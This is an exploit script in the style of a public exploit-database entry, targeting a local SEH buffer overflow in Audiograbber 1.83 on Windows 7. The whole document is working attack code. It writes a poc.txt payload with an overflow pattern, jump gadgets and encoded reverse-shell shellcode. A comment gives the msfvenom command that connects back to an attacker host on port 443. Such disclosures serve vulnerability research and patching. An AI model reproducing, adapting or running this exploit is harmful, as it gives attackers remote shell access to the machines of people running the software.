# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH) # Date: 2018-06-16 # Exploit Author: Dennis 'dhn' Herrmann # Vendor Homepage: https://www.audiograbber.org/ # Version: 1.83 # Tested on: Windows 7 SP1 (x86) #!/usr/bin/env python # $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $ # # Tested with Windows 7 SP1 (x86) # Steps: # - Paste "poc.txt" content in the "Interpret" or "Album" field class Exploit: def __init__(self, shellcode): self._shellcode = shellcode self._payload = None def __write(self): f = open("poc.txt", "w") f.write(self._payload) f.close() def run(self): pattern = "A" * 256 jmp_short = "\xeb\x08\x90\x90" # short JMP pop2ret = "\x79\x91\x01\x10" # WMA8Connect.dll self._payload = pattern self._payload += jmp_short self._payload += pop2ret # The buffer is mangled so we have to jump # over the parts to reached our shellcode self._payload += "\x90" * 18 + jmp_short self._payload += "\x90" * 28 + jmp_short self._payload += "\x90" * 32 + self._shellcode self.__write() def main(): # msfvenom --platform windows -p windows/shell_reverse_tcp \ # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \ # -e x86/alpha_mixed -f py shellcode = ( "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51" "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50" "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77" "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61" "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50" "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32" "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b" "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c" "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b" "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50" "\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32" "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b" "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47" "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b" "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78" "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75" "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71" "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34" "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e" "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74" "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45" "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61" "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64" "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42" "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33" "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47" "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47" "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79" "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56" "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70" "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a" "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48" "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f" "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37" "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68" "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e" "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c" "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d" "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46" "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76" "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37" "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30" "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51" "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36" "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f" "\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36" "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67" "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65" "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d" "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a" "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77" "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43" "\x6b\x4f\x69\x45\x41\x41" ) exploit = Exploit(shellcode) exploit.run() if __name__ == "__main__": main()